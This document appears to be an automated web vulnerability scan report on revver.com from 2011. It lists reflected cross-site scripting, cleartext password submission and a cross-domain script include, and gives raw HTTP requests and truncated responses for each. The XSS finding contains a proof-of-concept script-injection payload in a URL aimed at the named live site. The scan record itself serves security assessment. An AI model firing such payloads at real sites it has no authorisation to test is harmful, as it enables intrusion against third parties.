1. Cross-site scripting (reflected)
2. Cleartext submission of password
3. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://revver.com |
Path: | /video/426755/peanut-labs |
GET /video/426755/peanut-labsf05e7"><script>alert(1)< Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:57:06 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 03:02:22 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:57:22 GMT ETag: 183ed9bf59280eb87751 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81323 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <form action="/account/login/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://revver.com |
Path: | /video/426755/peanut-labs |
GET /video/426755/peanut-labs Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:22 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 02:33:33 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT ETag: b8fdf6d76062d0f9cc23 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <div class="login-form-area"> <form action="/account/login/ <ul class="inline-form clearfix" style=""> ...[SNIP]... </label> <input id="password" name="password" type="password" /></li> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://revver.com |
Path: | /video/426755/peanut-labs |
GET /video/426755/peanut-labs Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:22 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 02:33:33 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT ETag: b8fdf6d76062d0f9cc23 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... </script> <script type="text/javascript" src="http://partner </script> ...[SNIP]... |